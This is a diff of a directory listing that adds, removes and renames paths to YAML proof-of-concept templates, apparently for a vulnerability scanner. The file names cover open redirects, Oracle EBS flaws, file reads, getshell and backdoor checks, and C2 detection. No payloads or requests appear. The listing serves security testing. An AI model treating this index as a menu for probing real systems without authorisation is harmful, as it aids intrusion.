./poc/open_redirect/netsweeper-open-redirect-9064.yaml ./poc/open_redirect/netsweeper-open-redirect.yaml @@ -52153,7 +52130,6 @@ ./poc/open_redirect/newsletter-open-redirect-9076.yaml ./poc/open_redirect/newsletter-open-redirect-9077.yaml ./poc/open_redirect/newsletter-open-redirect-9078.yaml -./poc/open_redirect/newsletter-open-redirect.yaml ./poc/open_redirect/nextjs-redirect.yaml ./poc/open_redirect/ninjaform-open-redirect-9133.yaml ./poc/open_redirect/ninjaform-open-redirect-9134.yaml @@ -52161,13 +52137,13 @@ ./poc/open_redirect/noptin-open-redirect.yaml ./poc/open_redirect/novnc-url-redirection-cve-2021-3654.yml ./poc/open_redirect/oRedirect1.yaml +./poc/open_redirect/odoo-cms-redirect-9199.yaml ./poc/open_redirect/odoo-cms-redirect-9200.yaml ./poc/open_redirect/odoo-cms-redirect-9201.yaml ./poc/open_redirect/odoo-openredirect.yaml ./poc/open_redirect/office365-open-redirect-9212.yaml ./poc/open_redirect/office365-open-redirect-9213.yaml ./poc/open_redirect/office365-open-redirect-9214.yaml -./poc/open_redirect/office365-open-redirect-9215.yaml ./poc/open_redirect/ojs-unauthenticated-open-redirect.yaml ./poc/open_redirect/open-redirect-00.yaml ./poc/open_redirect/open-redirect-01.yaml @@ -52214,7 +52190,6 @@ ./poc/open_redirect/open_redirect.yaml ./poc/open_redirect/openredirect.yaml ./poc/open_redirect/oracle-ebusiness-openredirect.yaml -./poc/open_redirect/otobo-open-redirect-9409.yaml ./poc/open_redirect/otobo-open-redirect-9410.yaml ./poc/open_redirect/otobo-open-redirect-9411.yaml ./poc/open_redirect/peters-login-redirect-099f67628707b3f385b479015262ac32.yaml @@ -52224,8 +52199,8 @@ ./poc/open_redirect/pieregister-open-redirect-9577.yaml ./poc/open_redirect/pieregister-open-redirect-9578.yaml ./poc/open_redirect/pieregister-open-redirect-9579.yaml -./poc/open_redirect/pieregister-plugin-open-redirect.yaml ./poc/open_redirect/pollbot-redirect-9621.yaml +./poc/open_redirect/pollbot-redirect-9622.yaml ./poc/open_redirect/pollbot-redirect-9623.yaml ./poc/open_redirect/postcode-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/postcode-redirect-8fce0528958fb8f6fccd77f326340662.yaml @@ -52372,7 +52347,6 @@ ./poc/open_redirect/sap-redirect-10065.yaml ./poc/open_redirect/sap-redirect-10066.yaml ./poc/open_redirect/sap-redirect-10067.yaml -./poc/open_redirect/sap-redirect.yaml ./poc/open_redirect/seo-redirection-00236bb3125835cea1f664a5a2990898.yaml ./poc/open_redirect/seo-redirection-02c98a3021ab90d177604810266eda87.yaml ./poc/open_redirect/seo-redirection-19ac51f8b0405a9ec28804b8aaa29d9c.yaml @@ -52423,7 +52397,6 @@ ./poc/open_redirect/thinkific-redirect-10737.yaml ./poc/open_redirect/tpg-redirect-85f56196634b8bf7c02f780064a6fc7d.yaml ./poc/open_redirect/tpg-redirect.yaml -./poc/open_redirect/ultimatemember-open-redirect-10877.yaml ./poc/open_redirect/ultimatemember-open-redirect-10878.yaml ./poc/open_redirect/ultimatemember-open-redirect-10879.yaml ./poc/open_redirect/ultimatemember-plugin-open-redirect.yaml @@ -52436,16 +52409,14 @@ ./poc/open_redirect/weekender-newspaper-open-redirect-11186.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11187.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11188.yaml -./poc/open_redirect/weekender-newspaper-open-redirect.yaml ./poc/open_redirect/weekender-newspaper-wp-theme-open-redirect.yaml ./poc/open_redirect/woo-login-redirect-317022364d5cdae673f22cdada5aba50.yaml ./poc/open_redirect/woo-login-redirect-e4654f9a46c58ec7da5e9256a56d6e89.yaml ./poc/open_redirect/woo-login-redirect.yaml ./poc/open_redirect/woocommerce-add-to-cart-custom-redirect-64a9b17becafc7bb8d1d5b45684524cd.yaml ./poc/open_redirect/woocommerce-add-to-cart-custom-redirect.yaml -./poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml ./poc/open_redirect/wordpress-redirection-plugin-listing-11307.yaml -./poc/open_redirect/wordpress-redirection-plugin-listing.yaml +./poc/open_redirect/wordpress-redirection-plugin-listing-11308.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-062dffbc9ba36d2c45b3c3ca1f34e0d3.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-76a6410aed89ec5d80b58eb825a4989b.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-c3c279f6a773c00d7aae3e43cf34cb82.yaml @@ -52454,20 +52425,20 @@ ./poc/open_redirect/wp-brandfolder-plugin-open-redirect.yaml ./poc/open_redirect/wp-domain-redirect-e5bf6ab8eeb40788caddb9493fd84dca.yaml ./poc/open_redirect/wp-domain-redirect.yaml +./poc/open_redirect/wp-grimag-open-redirect-11458.yaml ./poc/open_redirect/wp-grimag-open-redirect-11459.yaml ./poc/open_redirect/wp-grimag-open-redirect-11460.yaml ./poc/open_redirect/wp-grimag-open-redirect-11461.yaml ./poc/open_redirect/wp-grimag-open-redirect-11462.yaml +./poc/open_redirect/wp-gtranslate-open-redirect-11463.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11464.yaml -./poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11466.yaml -./poc/open_redirect/wp-gtranslate-open-redirect.yaml ./poc/open_redirect/wp-login-and-logout-redirect-bcc9e091fa98d610ac79a7162207c92e.yaml ./poc/open_redirect/wp-login-and-logout-redirect.yaml -./poc/open_redirect/wp-prostore-open-redirect-11546.yaml ./poc/open_redirect/wp-prostore-open-redirect-11547.yaml ./poc/open_redirect/wp-prostore-open-redirect-11548.yaml ./poc/open_redirect/wp-prostore-open-redirect-11549.yaml +./poc/open_redirect/wp-prostore-open-redirect-11550.yaml ./poc/open_redirect/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml ./poc/open_redirect/wp-search-keyword-redirect.yaml ./poc/open_redirect/wp-security-open-redirect.yaml @@ -52485,6 +52456,7 @@ ./poc/open_redirect/wpcf7-redirect-abd6bd305348b8021e7310c8ca2e06d0.yaml ./poc/open_redirect/wpcf7-redirect-c8c16c617550c7db690dbef59bc3b26a.yaml ./poc/open_redirect/wpcf7-redirect.yaml +./poc/open_redirect/wptouch-open-redirect-11592.yaml ./poc/open_redirect/wptouch-open-redirect-11593.yaml ./poc/open_redirect/wptouch-open-redirect-11594.yaml ./poc/open_redirect/wptouch-open-redirect-11595.yaml @@ -52509,9 +52481,9 @@ ./poc/oracle/default-oracle-application-page-6893.yaml ./poc/oracle/default-oracle-application-page.yaml ./poc/oracle/dms-oracle.yaml +./poc/oracle/metadata-oracle-8829.yaml ./poc/oracle/metadata-oracle-8830.yaml ./poc/oracle/metadata-oracle-8831.yaml -./poc/oracle/metadata-oracle.yaml ./poc/oracle/oracle-access-management.yaml ./poc/oracle/oracle-access-manager.yaml ./poc/oracle/oracle-adf-faces.yaml @@ -52520,7 +52492,6 @@ ./poc/oracle/oracle-business-control-9344.yaml ./poc/oracle/oracle-business-control-9345.yaml ./poc/oracle/oracle-business-control-9346.yaml -./poc/oracle/oracle-business-control-9347.yaml ./poc/oracle/oracle-business-control-9348.yaml ./poc/oracle/oracle-business-control.yaml ./poc/oracle/oracle-business-intelligence-password.yaml @@ -52529,8 +52500,6 @@ ./poc/oracle/oracle-containers-panel.yaml ./poc/oracle/oracle-dbass-detect-9349.yaml ./poc/oracle/oracle-dbass-detect-9350.yaml -./poc/oracle/oracle-dbass-detect-9351.yaml -./poc/oracle/oracle-dbass-detect.yaml ./poc/oracle/oracle-dbcs-9352.yaml ./poc/oracle/oracle-dbcs-9353.yaml ./poc/oracle/oracle-dbcs-9354.yaml @@ -52552,7 +52521,6 @@ ./poc/oracle/oracle-ebs-desr.yaml ./poc/oracle/oracle-ebs-lfi.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9367.yaml -./poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9372.yaml @@ -52560,8 +52528,8 @@ ./poc/oracle/oracle-ebs-xss-1.yaml ./poc/oracle/oracle-ebs-xss-2.yaml ./poc/oracle/oracle-ebs-xss-3.yaml +./poc/oracle/oracle-ebs-xss-9373.yaml ./poc/oracle/oracle-ebs-xss-9375.yaml -./poc/oracle/oracle-ebs-xss-9376.yaml ./poc/oracle/oracle-ebs-xss-9377.yaml ./poc/oracle/oracle-ebs-xss.yaml ./poc/oracle/oracle-ebusiness-openredirect.yaml @@ -52576,20 +52544,20 @@ ./poc/oracle/oracle-http-server-12c-9381.yaml ./poc/oracle/oracle-http-server-12c-9382.yaml ./poc/oracle/oracle-http-server-12c-9383.yaml +./poc/oracle/oracle-http-server-12c-9384.yaml ./poc/oracle/oracle-http-server-12c.yaml ./poc/oracle/oracle-httpserver12c.yaml -./poc/oracle/oracle-integrated-manager-9386.yaml ./poc/oracle/oracle-integrated-manager-9387.yaml ./poc/oracle/oracle-integrated-manager-9388.yaml ./poc/oracle/oracle-integrated-manager-9389.yaml ./poc/oracle/oracle-integrated-manager-9390.yaml ./poc/oracle/oracle-integrated-manager.yaml ./poc/oracle/oracle-iplanet-web-server-9391.yaml +./poc/oracle/oracle-iplanet-web-server-9392.yaml ./poc/oracle/oracle-iplanet-web-server-9393.yaml -./poc/oracle/oracle-iplanet-web-server.yaml ./poc/oracle/oracle-oam-xss.yaml +./poc/oracle/oracle-opera-login.yaml ./poc/oracle/oracle-opera.yaml -./poc/oracle/oracle-people-enterprise-9394.yaml ./poc/oracle/oracle-people-enterprise-9395.yaml ./poc/oracle/oracle-people-enterprise-9396.yaml ./poc/oracle/oracle-people-enterprise-9397.yaml @@ -52863,7 +52831,6 @@ ./poc/other/Avada.yaml ./poc/other/B2Bbuilder_v7-getshell.yaml ./poc/other/Bitrix_Account_UIDH.yaml -./poc/other/Bitrix_check_env.yaml ./poc/other/Bitrix_server_testcheck.yaml ./poc/other/CISA.yaml ./poc/other/CORS Pre-Flight Bypass.yaml @@ -52939,6 +52906,7 @@ ./poc/other/LPDString.yaml ./poc/other/LSCP.yaml ./poc/other/LayerSlider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/LayerSlider-plugin.yaml ./poc/other/LibreOfficeImpressSCPair.yaml ./poc/other/LiveBOS_ShowImage_FileRead.yaml ./poc/other/Lm-FileRead.yaml @@ -53048,7 +53016,6 @@ ./poc/other/X-Host.yaml ./poc/other/X-Remote-Addr .yaml ./poc/other/X-Remote-IP .yaml -./poc/other/X-Remote-IP.yaml ./poc/other/X-Rewrite-URL.yaml ./poc/other/X11Probe.yaml ./poc/other/Yes-059f1c0288ee3dfe1136ff4836457838.yaml @@ -53347,6 +53314,7 @@ ./poc/other/aceide-14b870f70e50eff1b77bf2010d096cc3.yaml ./poc/other/aceide.yaml ./poc/other/acenet-acereporter-report-component-arbitrary-file-download.yaml +./poc/other/acenet-panel.yaml ./poc/other/acf-blocks-72203531faf01029b7468e544a690bea.yaml ./poc/other/acf-blocks-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/acf-blocks-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -53429,10 +53397,10 @@ ./poc/other/activello-eb89877ab588a18f94a6a8698e8b083b.yaml ./poc/other/activello-fbae3dec6ddfe8541595eba73b51e18b.yaml ./poc/other/activello.yaml -./poc/other/activemq-panel-49.yaml ./poc/other/activemq-panel-50.yaml ./poc/other/activemq-panel-51.yaml ./poc/other/activemq-panel-52.yaml +./poc/other/activemq-panel-53.yaml ./poc/other/activemq-panel.yaml ./poc/other/activemq-workflow.yaml ./poc/other/activity-reactions-for-buddypress-b67dd1397f4398dc9c75761e3da9f36b.yaml @@ -53446,11 +53414,11 @@ ./poc/other/activitytime.yaml ./poc/other/actuator.yaml ./poc/other/acunetix-360-installer.yaml -./poc/other/acunetix-panel-54.yaml ./poc/other/acunetix-panel-55.yaml +./poc/other/acunetix-panel-56.yaml ./poc/other/acunetix-panel-57.yaml +./poc/other/acunetix-panel-58.yaml ./poc/other/acunetix-panel-59.yaml -./poc/other/acunetix-panel.yaml ./poc/other/acunetix-wvs.yaml ./poc/other/acymailing-882e0d234614e9072c071f9d28362d8a.yaml ./poc/other/acymailing-e3e6bd9ad6bff9c17b39c48f591400ea.yaml @@ -53783,9 +53751,9 @@ ./poc/other/adminer-panel-5.yaml ./poc/other/adminer-panel-6.yaml ./poc/other/adminer-panel-7.yaml -./poc/other/adminer-panel-74.yaml ./poc/other/adminer-panel-75.yaml ./poc/other/adminer-panel-76.yaml +./poc/other/adminer-panel-77.yaml ./poc/other/adminer-panel.yaml ./poc/other/adminer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/adminer-plugin.yaml @@ -53816,7 +53784,7 @@ ./poc/other/adminpad-024c994284cb4846e1f6626814560a64.yaml ./poc/other/adminpad.yaml ./poc/other/adminset-panel-78.yaml -./poc/other/adminset-panel-80.yaml +./poc/other/adminset-panel-79.yaml ./poc/other/adminset-panel.yaml ./poc/other/adplugg-058141c25a1a879f99185b818d355e02.yaml ./poc/other/adplugg-4cde8c10175a7219c94dab4ded72ef4e.yaml @@ -53884,6 +53852,7 @@ ./poc/other/advance-menu-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/advance-menu-manager-plugin.yaml ./poc/other/advance-menu-manager.yaml +./poc/other/advance-setup-119.yaml ./poc/other/advance-setup-120.yaml ./poc/other/advance-setup-121.yaml ./poc/other/advance-setup-122.yaml @@ -54270,7 +54239,6 @@ ./poc/other/akamai-cloudtest-250.yaml ./poc/other/akamai-cloudtest-251.yaml ./poc/other/akamai-cloudtest-252.yaml -./poc/other/akamai-cloudtest-253.yaml ./poc/other/akamai-cloudtest-254.yaml ./poc/other/akamai-cloudtest.yaml ./poc/other/akeeba-installer.yaml @@ -54325,7 +54293,6 @@ ./poc/other/alibaba-anyproxy-fetchbody-anyfile-read.yaml ./poc/other/alibaba-anyproxy.yaml ./poc/other/alibaba-canal-info-leak-264.yaml -./poc/other/alibaba-canal-info-leak-266.yaml ./poc/other/alibaba-canal-info-leak-267.yaml ./poc/other/alibaba-canal-info-leak.yaml ./poc/other/alibaba-canal-info-leak.yml @@ -54333,6 +54300,7 @@ ./poc/other/alibaba-nacos.yaml ./poc/other/alibaba-企业邮箱.yaml ./poc/other/alibaba_canal.yaml +./poc/other/alienvault-usm-271.yaml ./poc/other/alienvault-usm-272.yaml ./poc/other/alienvault-usm-273.yaml ./poc/other/alienvault-usm-274.yaml @@ -54596,10 +54564,11 @@ ./poc/other/amplus-theme.yaml ./poc/other/amplus.yaml ./poc/other/ampps-admin-panel-304.yaml -./poc/other/ampps-admin-panel-305.yaml +./poc/other/ampps-admin-panel-306.yaml +./poc/other/ampps-dirlisting-307.yaml ./poc/other/ampps-dirlisting-308.yaml -./poc/other/ampps-dirlisting.yaml ./poc/other/ampps-panel-309.yaml +./poc/other/ampps-panel-310.yaml ./poc/other/ampps-panel-311.yaml ./poc/other/amprion-gridloss-panel.yaml ./poc/other/amr-ical-events-list-79f8d987b4bea1a528f8215f9b8ae142.yaml @@ -54694,6 +54663,7 @@ ./poc/other/announcer.yaml ./poc/other/anonymous-restricted-content-a1c228113f48faf98c264ba16b96c84a.yaml ./poc/other/anonymous-restricted-content.yaml +./poc/other/ansible-semaphore-panel.yaml ./poc/other/ansible-semaphore-panel.yml ./poc/other/answer-my-question-8a0ce85767e93614bc51f451c8474050.yaml ./poc/other/answer-my-question-90c1ca4071e6bd7fcadc8c89c4c29851.yaml @@ -54746,9 +54716,9 @@ ./poc/other/antreas-66ba1859ab560343222a23f4bdd2510b.yaml ./poc/other/antreas-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/antreas.yaml -./poc/other/antsword-backdoor-333.yaml ./poc/other/antsword-backdoor-334.yaml ./poc/other/antsword-backdoor-335.yaml +./poc/other/antsword-backdoor.yaml ./poc/other/anual-archive-233a1eb6f6f8782c599ef9a31673793f.yaml ./poc/other/anual-archive-9a361b8a04b5344c6923b947e14e5de1.yaml ./poc/other/anual-archive-e3376d4b2f2bf202a6fcc995d3f8fb1c.yaml @@ -55052,7 +55022,6 @@ ./poc/other/articlepublisherpro.yaml ./poc/other/artifactory-anonymous-deploy-547.yaml ./poc/other/artifactory-anonymous-deploy-548.yaml -./poc/other/artifactory-anonymous-deploy-549.yaml ./poc/other/artifactory-anonymous-deploy.yaml ./poc/other/artifactory-workflow.yaml ./poc/other/artifactory_deploy.yaml @@ -55131,6 +55100,7 @@ ./poc/other/aspose-doc-exporter-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/aspose-doc-exporter-plugin.yaml ./poc/other/aspose-doc-exporter.yaml +./poc/other/aspose-file-download-558.yaml ./poc/other/aspose-file-download-559.yaml ./poc/other/aspose-file-download-560.yaml ./poc/other/aspose-file-download-561.yaml @@ -55155,8 +55125,8 @@ ./poc/other/aspose-pdf-file-download-567.yaml ./poc/other/aspose-pdf-file-download-568.yaml ./poc/other/aspose-pdf-file-download-569.yaml -./poc/other/aspose-pdf-file-download.yaml ./poc/other/aspose-words-exporter-file-download.yaml +./poc/other/aspose-words-file-download-571.yaml ./poc/other/aspose-words-file-download-572.yaml ./poc/other/aspose-words-file-download-573.yaml ./poc/other/aspose-words-file-download-574.yaml @@ -55289,6 +55259,7 @@ ./poc/other/audio-video-download-buttons-for-youtube-plugin.yaml ./poc/other/audio-video-download-buttons-for-youtube.yaml ./poc/other/audio.yaml +./poc/other/audiobookshelf-panel.yaml ./poc/other/audit.yaml ./poc/other/augmented-reality-1c6032510cc675f4443ed5957cd5ebf8.yaml ./poc/other/augmented-reality-afd76b54e4672fae1a12cf88cc16c59a.yaml @@ -55366,7 +55337,6 @@ ./poc/other/automatic-youtube-video-posts-91707c7304defdf4c829758df5f60ae2.yaml ./poc/other/automatic-youtube-video-posts.yaml ./poc/other/automation-direct-596.yaml -./poc/other/automation-direct-597.yaml ./poc/other/automatisch-panel.yaml ./poc/other/autoptimize-1cd3f0584531536972eeaec5bd981bf9.yaml ./poc/other/autoptimize-2ecfdf7e957d875bca93a4c9bd866fc9.yaml @@ -55552,7 +55522,7 @@ ./poc/other/axis-happyaxis-3.yaml ./poc/other/axis-happyaxis-4.yaml ./poc/other/axis-happyaxis-669.yaml -./poc/other/axis-happyaxis-670.yaml +./poc/other/axis-happyaxis.yaml ./poc/other/axublog_v1-app-lfr.yaml ./poc/other/axway-securetransport-panel.yaml ./poc/other/axxon-client-panel.yaml @@ -55688,8 +55658,8 @@ ./poc/other/barelycorporate-theme.yaml ./poc/other/barelycorporate.yaml ./poc/other/barracuda-panel-684.yaml -./poc/other/barracuda-panel-685.yaml ./poc/other/barracuda-panel-686.yaml +./poc/other/barracuda-panel.yaml ./poc/other/barracuda-ssl-vpn.yaml ./poc/other/base64-encoderdecoder-09686b367b0230c3ebddda7a7420b807.yaml ./poc/other/base64-encoderdecoder-944ed1eede1fb5405084bd3b6720d51a.yaml @@ -55707,10 +55677,10 @@ ./poc/other/basic-cors-694.yaml ./poc/other/basic-cors-flash.yaml ./poc/other/basic-cors.yaml -./poc/other/basic-dns-example.yaml ./poc/other/basic-interactive-world-map-5a936b7212cd70626f050c9aba22bae7.yaml ./poc/other/basic-interactive-world-map.yaml ./poc/other/basic-ztls.yaml +./poc/other/basic.yaml ./poc/other/basicdir.yaml ./poc/other/baslider-2f67fdfc4f1a78ca3de5bde446cb180a.yaml ./poc/other/baslider-74e4a2a8812ec01ced90b2ffbb2ed2e3.yaml @@ -55967,6 +55937,7 @@ ./poc/other/betteroptin-09712df89f849ba85b08f5f0deb0865b.yaml ./poc/other/betteroptin.yaml ./poc/other/beyeon-iot.yaml +./poc/other/beyondtrust-panel-720.yaml ./poc/other/beyondtrust-panel-721.yaml ./poc/other/beyondtrust-panel.yaml ./poc/other/beyondtrust-priv-panel.yaml @@ -56015,7 +55986,6 @@ ./poc/other/bigip-pwner-workflow.yaml ./poc/other/bigip-rest-panel.yaml ./poc/other/bigip-workflow.yaml -./poc/other/bigip.yaml ./poc/other/bilin-uag系列网关.yaml ./poc/other/billingo-8170de96a4160ed4ed65414450456c1d.yaml ./poc/other/billingo.yaml @@ -56068,8 +56038,8 @@ ./poc/other/bitrix-log-file-found.yaml ./poc/other/bitrix-panel-746.yaml ./poc/other/bitrix-panel-747.yaml +./poc/other/bitrix-panel-748.yaml ./poc/other/bitrix-panel-749.yaml -./poc/other/bitrix-panel-750.yaml ./poc/other/bitrix-panel.yaml ./poc/other/bitrix-registration.yaml ./poc/other/bitrix-site-manager.yaml @@ -56443,7 +56413,7 @@ ./poc/other/bookshelf-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bookshelf-plugin.yaml ./poc/other/bookshelf.yaml -./poc/other/bookstack-panel-767.yaml +./poc/other/bookstack-panel-766.yaml ./poc/other/bookstack-panel.yaml ./poc/other/bookx-5affa43bf6a3586e393859cf0e61918f.yaml ./poc/other/bookx.yaml @@ -56758,8 +56728,8 @@ ./poc/other/bubble-menu-825844feae3c0993ba26ca24f6beb496.yaml ./poc/other/bubble-menu-954097b83211a929d7262429b922e34b.yaml ./poc/other/bubble-menu.yaml -./poc/other/buddy-panel-797.yaml ./poc/other/buddy-panel.yaml +./poc/other/buddy-panel.yml ./poc/other/buddybadges-14c7b37e2a39ea3c10caf2185d80b202.yaml ./poc/other/buddybadges.yaml ./poc/other/buddyboss-media-794752612993f73caae67523973ec768.yaml @@ -57155,13 +57125,13 @@ ./poc/other/cachethq.yaml ./poc/other/cacti-WeakPass.yaml ./poc/other/cacti-cacti-info.yaml -./poc/other/cacti-panel-829.yaml +./poc/other/cacti-panel-828.yaml ./poc/other/cacti-panel.yaml ./poc/other/cacti-weathermap-file-write-1.yaml ./poc/other/cacti-weathermap-file-write-2.yaml ./poc/other/cacti-weathermap-file-write-830.yaml ./poc/other/cacti-weathermap-file-write-831.yaml -./poc/other/cacti-weathermap-file-write-833.yaml +./poc/other/cacti-weathermap-file-write-832.yaml ./poc/other/cacti-weathermap-file-write.yaml ./poc/other/cacti-weathermap-file-write.yml ./poc/other/cacti-workflow-834.yaml @@ -57247,7 +57217,7 @@ ./poc/other/campaign-url-builder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/campaign-url-builder-plugin.yaml ./poc/other/campaign-url-builder.yaml -./poc/other/campaignmonitor-841.yaml +./poc/other/campaignmonitor-842.yaml ./poc/other/campaignmonitor-843.yaml ./poc/other/campaignmonitor.yaml ./poc/other/campsite.yaml @@ -57260,6 +57230,7 @@ ./poc/other/campus-directory-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/campus-directory-plugin.yaml ./poc/other/campus-directory.yaml +./poc/other/can-i-take-over-dns-852.yaml ./poc/other/can-i-take-over-dns.yaml ./poc/other/canal-admin.yaml ./poc/other/cancosoft-asset-management.yaml @@ -57610,13 +57581,13 @@ ./poc/other/ceph.yaml ./poc/other/cerberus-helpdesk.yaml ./poc/other/cerberus-malware.yaml -./poc/other/cerebro-panel-878.yaml ./poc/other/cerebro-panel-879.yaml ./poc/other/cerebro-panel-880.yaml +./poc/other/cerebro-panel-881.yaml ./poc/other/cerebro-panel.yaml ./poc/other/cerebro.yaml -./poc/other/certificate-validation-882.yaml ./poc/other/certificate-validation-883.yaml +./poc/other/certificate-validation-884.yaml ./poc/other/certificate-validation.yaml ./poc/other/cetc-工业防火墙.yaml ./poc/other/cf-geoplugin-58ca0142ffd9a9b2258c8cbb40585337.yaml @@ -57712,7 +57683,8 @@ ./poc/other/cgc-maintenance-mode-d395c79f773ee5d70312487be14f72dc.yaml ./poc/other/cgc-maintenance-mode.yaml ./poc/other/cgi-printenv-885.yaml -./poc/other/cgi-test-page-888.yaml +./poc/other/cgi-printenv.yaml +./poc/other/cgi-test-page-887.yaml ./poc/other/cgi-test-page-889.yaml ./poc/other/cgi-test-page-890.yaml ./poc/other/cgi-test-page.yaml @@ -57859,7 +57831,6 @@ ./poc/other/checkpoint-firewall-enum.yaml ./poc/other/checkpoint-panel-1.yaml ./poc/other/checkpoint-panel-2.yaml -./poc/other/checkpoint-panel-898.yaml ./poc/other/checkpoint-panel-899.yaml ./poc/other/checkpoint-panel.yaml ./poc/other/checkpoint-workflow.yaml @@ -57955,8 +57926,8 @@ ./poc/other/cip4-folder-download-widget.yaml ./poc/other/ciphermail-email-encryption-gateway.yaml ./poc/other/circarlife-setup-917.yaml +./poc/other/circarlife-setup-918.yaml ./poc/other/circarlife-setup-919.yaml -./poc/other/circarlife-setup-920.yaml ./poc/other/circarlife-setup-921.yaml ./poc/other/circarlife-workflow.yaml ./poc/other/circle-image-slider-with-lightbox-4fd17830432213426bf64fdc98490b12.yaml @@ -57979,6 +57950,7 @@ ./poc/other/citrix-access-gateway.yaml ./poc/other/citrix-metaframe.yaml ./poc/other/citrix-netscaler.yaml +./poc/other/citrix-oob-memory-read.yaml ./poc/other/citrix-receiver.yaml ./poc/other/citrix-workflow.yaml ./poc/other/citrix-xcp.yaml @@ -58071,7 +58043,7 @@ ./poc/other/clearfy-plugin.yaml ./poc/other/clearfy.yaml ./poc/other/clearpass-policy-manager-1000.yaml -./poc/other/clearpass-policy-manager-997.yaml +./poc/other/clearpass-policy-manager-1001.yaml ./poc/other/clearpass-policy-manager-998.yaml ./poc/other/clearpass-policy-manager-999.yaml ./poc/other/clearpass-policy-manager.yaml @@ -58142,8 +58114,8 @@ ./poc/other/client-portal-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/client-portal-plugin.yaml ./poc/other/client-portal.yaml +./poc/other/clientaccesspolicy-1005.yaml ./poc/other/clientaccesspolicy-1006.yaml -./poc/other/clientaccesspolicy-1007.yaml ./poc/other/clientaccesspolicy.yaml ./poc/other/clientexec.yaml ./poc/other/clio-grow-form-0f4e293198ec169f18fb2dff762bdf30.yaml @@ -58395,7 +58367,7 @@ ./poc/other/codup-read-only-admin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/codup-read-only-admin-plugin.yaml ./poc/other/codup-read-only-admin.yaml -./poc/other/cofense-vision-panel-1141.yaml +./poc/other/cofense-vision-panel-1142.yaml ./poc/other/cofense-vision-panel.yaml ./poc/other/cogent-datahub.yaml ./poc/other/colasoft-mdp.yaml @@ -58774,7 +58746,6 @@ ./poc/other/contact-form-7-skins.yaml ./poc/other/contact-form-7-style-ba8463f8475723d7b9fa15f84254b841.yaml ./poc/other/contact-form-7-style.yaml -./poc/other/contact-form-7.yaml ./poc/other/contact-form-add-2770bbb352eafe34363256cb285ef179.yaml ./poc/other/contact-form-add-303736b9e91ff80899d370834b9fa7f2.yaml ./poc/other/contact-form-add-34b4a6bc490c1a27759b7a1aa3c2b1d4.yaml @@ -59507,6 +59478,7 @@ ./poc/other/cross-origin-opener-policy.yaml ./poc/other/cross-rss-80679996637c491ca713f9608717b246.yaml ./poc/other/cross-rss.yaml +./poc/other/crossdomain-xml-1267.yaml ./poc/other/crossdomain-xml-1268.yaml ./poc/other/crossdomain-xml-1269.yaml ./poc/other/crossdomin-xml.yaml @@ -59545,6 +59517,7 @@ ./poc/other/cryptocurrency-widgets-pack-df87c30565c27eb58e0271f0dfd6d08b.yaml ./poc/other/cryptocurrency-widgets-pack.yaml ./poc/other/cryptocurrency.yaml +./poc/other/csod-panel-1286.yaml ./poc/other/csod-panel-1287.yaml ./poc/other/csod-panel-1288.yaml ./poc/other/csod-panel-1289.yaml @@ -59851,6 +59824,7 @@ ./poc/other/custom-version.yaml ./poc/other/custom_nuclei-1.yaml ./poc/other/custom_nuclei-2.yaml +./poc/other/custom_nuclei-3.yaml ./poc/other/custom_nuclei-4.yaml ./poc/other/custom_nuclei-5.yaml ./poc/other/custom_nuclei-6.yaml @@ -59899,9 +59873,8 @@ ./poc/other/d-link-arbitary-fileread-7040.yaml ./poc/other/d-link-arbitary-fileread-7041.yaml ./poc/other/d-link-arbitary-fileread-7042.yaml -./poc/other/d-link-arbitary-fileread-7044.yaml +./poc/other/d-link-arbitary-fileread-7043.yaml ./poc/other/d-link-arbitary-fileread-7046.yaml -./poc/other/d-link-wireless-7047.yaml ./poc/other/d-link-wireless-7048.yaml ./poc/other/d-link-wireless-7049.yaml ./poc/other/d-link-wireless-7050.yaml @@ -60038,7 +60011,6 @@ ./poc/other/dd-post-carousel.yaml ./poc/other/dd-rating-abefceeefb99cff148ca67c77873866d.yaml ./poc/other/dd-rating.yaml -./poc/other/dead-host-with-cname-6786.yaml ./poc/other/dead-host-with-cname.yaml ./poc/other/deal-of-the-day-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/deal-of-the-day.yaml @@ -60069,6 +60041,7 @@ ./poc/other/defender-security-eb34b3c3b8ff1ca77abae88402bd4aa7.yaml ./poc/other/defender-security.yaml ./poc/other/deimos-c2-jarm.yaml +./poc/other/deimos-c2.yaml ./poc/other/dejavu-78b157490e17d28e7e04d9f12a1bb6bd.yaml ./poc/other/dejavu-8694503a0b15276ddaea2d6b4be99aaa.yaml ./poc/other/dejavu-9449ef76879953c9ac6d19c4c293def1.yaml @@ -60196,7 +60169,6 @@ ./poc/other/development-logs-2.yaml ./poc/other/development-logs-3.yaml ./poc/other/development-logs-6987.yaml -./poc/other/development-logs-6989.yaml ./poc/other/development-logs.yaml ./poc/other/devformatter-0473642f46ba628f35ee6f5a15e577ba.yaml 